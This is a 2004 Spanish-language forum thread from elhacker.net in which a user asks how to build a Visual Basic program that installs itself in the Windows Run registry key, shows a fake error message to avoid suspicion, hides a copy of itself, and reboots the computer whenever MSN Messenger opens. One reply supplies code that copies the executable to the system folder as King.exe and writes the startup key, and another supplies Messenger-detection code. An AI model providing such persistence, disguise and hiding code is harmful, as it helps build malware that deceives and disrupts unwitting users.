elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Dudas en VISUAL BASIC
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Dudas en VISUAL BASIC  (Leído 2,908 veces)
Villamil

Desconectado Desconectado

Mensajes: 95


¿Que se supone que tenog que poner aquí?


Ver Perfil WWW
Dudas en VISUAL BASIC
« en: 6 Julio 2004, 22:19 pm »

Para el siguiente programa, tengo 3 dudas:

El programa lo que hace es meterse en le regedit de windows y abrirse siempre que se inicie windows, lo primero da una msgbox de error del programa pa que no desconfie, luego cada vez que inicia messenger reinicia el ordenador.

Dudas:

1º.- ¿Cómo hago que se haga algo cada vez que se inicie el messenger?
2º.- La primera vez tienes que meterse en el regedit de windows, lanzas la msgbox... ¿pero cómo hago eso?, es decir, ¿cómo hago que unas cosas las haga sólo la primera vez y, otras, siempre?
3º.-En el regedit de windows dice donde está el fichero para que se inicie, pero yo creo que alguien lo mas mínimo listo lo borraría, así que, ¿hay alguna forma de que se guarde a sí mismo y se oculte para que no se de cuenta el usuario?

Gracias


En línea

byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: Dudas en VISUAL BASIC
« Respuesta #1 en: 6 Julio 2004, 22:28 pm »

Citar
1º.- ¿Cómo hago que se haga algo cada vez que se inicie el messenger?

una forma facil es buscar la ventana del messenger, o buscar el proceso con el nombre del ejecutable que buscas.

Citar
2º.- La primera vez tienes que meterse en el regedit de windows, lanzas la msgbox... ¿pero cómo hago eso?, es decir, ¿cómo hago que unas cosas las haga sólo la primera vez y, otras, siempre?

pasar parametros es una buena opcion. pj: si no se le pasa ninguno es la primera ejecucion, si se le pasan ya a sido ejecutado mas de 1 vez.

Citar
3º.-En el regedit de windows dice donde está el fichero para que se inicie, pero yo creo que alguien lo mas mínimo listo lo borraría, así que, ¿hay alguna forma de que se guarde a sí mismo y se oculte para que no se de cuenta el usuario?

alguien lo mas minimo listo se dara cuenta de todos modos.

y ahora que veo tu IM, no me mandes lo mismo que preguntas en el foro por privado.


« Última modificación: 6 Julio 2004, 22:30 pm por Mr.Potato » En línea

Villamil

Desconectado Desconectado

Mensajes: 95


¿Que se supone que tenog que poner aquí?


Ver Perfil WWW
Re: Dudas en VISUAL BASIC
« Respuesta #2 en: 6 Julio 2004, 22:36 pm »

¿Como hago para que busque el proceso?
¿Qué es eso de parámetros?
¿...?
Pufff... explicarme algo por favor que llevo en esto de la programacion desde marzo + o -...
 ??? ??? ???
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: Dudas en VISUAL BASIC
« Respuesta #3 en: 6 Julio 2004, 23:01 pm »

Mira, con este código haces que el programa se inicie cada vez que se encienda el PC y muestra un mensaje de error SOLO la primera vez:

Código:
 Set File = CreateObject("scripting.filesystemobject")
 Set Regedit = CreateObject("WScript.Shell")
 Form1.Visible = False
 Programa = App.Path + "\" + App.EXEName + ".exe"
 Set SysDir = File.GetSpecialFolder(1)
 File.CopyFile Programa, SysDir & "\King.exe"
 Reg = Regedit.RegRead "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\King"
 If Reg = "" Then MsgBox "Aqui va el mensaje de error :P"
 Reg = Regedit.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\King", SysDir & "\King.exe"


Para localizar el proceso del Messenger tienes que usar una API, y yo me llevo un poco mal con las APIS, xD
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: Dudas en VISUAL BASIC
« Respuesta #4 en: 7 Julio 2004, 00:12 am »

Citar
¿Como hago para que busque el proceso?
¿Qué es eso de parámetros?
¿...?
Pufff... explicarme algo por favor que llevo en esto de la programacion desde marzo + o -...
 

si no entiendes algo pq no empiezas por algo mas facil? mirate la sección de ejercicios que tienes para entretenerte un rato.
En línea

Villamil

Desconectado Desconectado

Mensajes: 95


¿Que se supone que tenog que poner aquí?


Ver Perfil WWW
Re: Dudas en VISUAL BASIC
« Respuesta #5 en: 7 Julio 2004, 21:32 pm »

Bien, ya lo conseguí a mi manera
para lo de que sólo la primera vez modifico una clave de 0 o 1 y listo , y para que se guarde a si mismo probe que copie el file: ".\nombreprograma.exe" pork creia que funcionaba pero.... lo copio para la carpeta de windows k casi nadie miray ya ta.... pa lo de msn me imagino que cambiara la clave k ai en el registro cuando esta activo o no, si no..... pos a discurrir...
En línea

ø:|The_hacker|:ø

Desconectado Desconectado

Mensajes: 207


Code Name: TH-2kx


Ver Perfil
Re: Dudas en VISUAL BASIC
« Respuesta #6 en: 10 Julio 2004, 00:54 am »

Mira tengo una idea para detectar cuando se abra el messenger:

hacer un ejecutable que este preparado para detectar esto...


Y esta es la idea:

Código:
Option Explicit

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Dim MSN As Long

Private Sub Form_Load()
      Do While MSN = 0
           MSN = FindWindow(vbNullString, "MSN Messenger")
      Loop
      MsgBox "El Messenger esta abierto"
End Sub

Espero que te sirva...
En línea

..Empieza por hacer lo necesario, luego lo que es posible, y de pronto te encontrarás haciendo lo imposible..|:ø:|The_hacker|:ø:|
byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: Dudas en VISUAL BASIC
« Respuesta #7 en: 10 Julio 2004, 07:19 am »

si el messenger esta en la bandeja no lo detecta, por lo que me gusta mas buscar el proceso.
En línea

Execod

Desconectado Desconectado

Mensajes: 32


shake your fundations!


Ver Perfil WWW
Re: Dudas en VISUAL BASIC
« Respuesta #8 en: 13 Julio 2004, 10:32 am »

es mejor encontrar el proceso, es mas preciso, ayq ue algunos programa tienen dobles espacios en sus nombres,..
En línea

On Error GoTo:

http://scodman.tk

<EOF>
chofoman

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Dudas en VISUAL BASIC
« Respuesta #9 en: 22 Noviembre 2005, 23:12 pm »

Necesito ayuda...

Necesito q el mes actual de la makina lo devuelva en un label...pero solo el mes como lo puedo hacer...muchas gracias
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
dudas visual basic 2012
.NET (C#, VB.NET, ASP)
General Dmitry Vergadoski 2 2,065 Último mensaje 14 Enero 2013, 01:51 am
por Eleкtro
Dudas con programa microsoft Visual C++ 6.0
Ingeniería Inversa
spounk 2 2,418 Último mensaje 30 Mayo 2019, 22:23 pm
por apuromafo CLS
Dudas respecto a P-Code de Visual Basic 5/6
Ingeniería Inversa
ReverseCappuccino 3 5,334 Último mensaje 9 Febrero 2022, 20:38 pm
por MCKSys Argentina
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines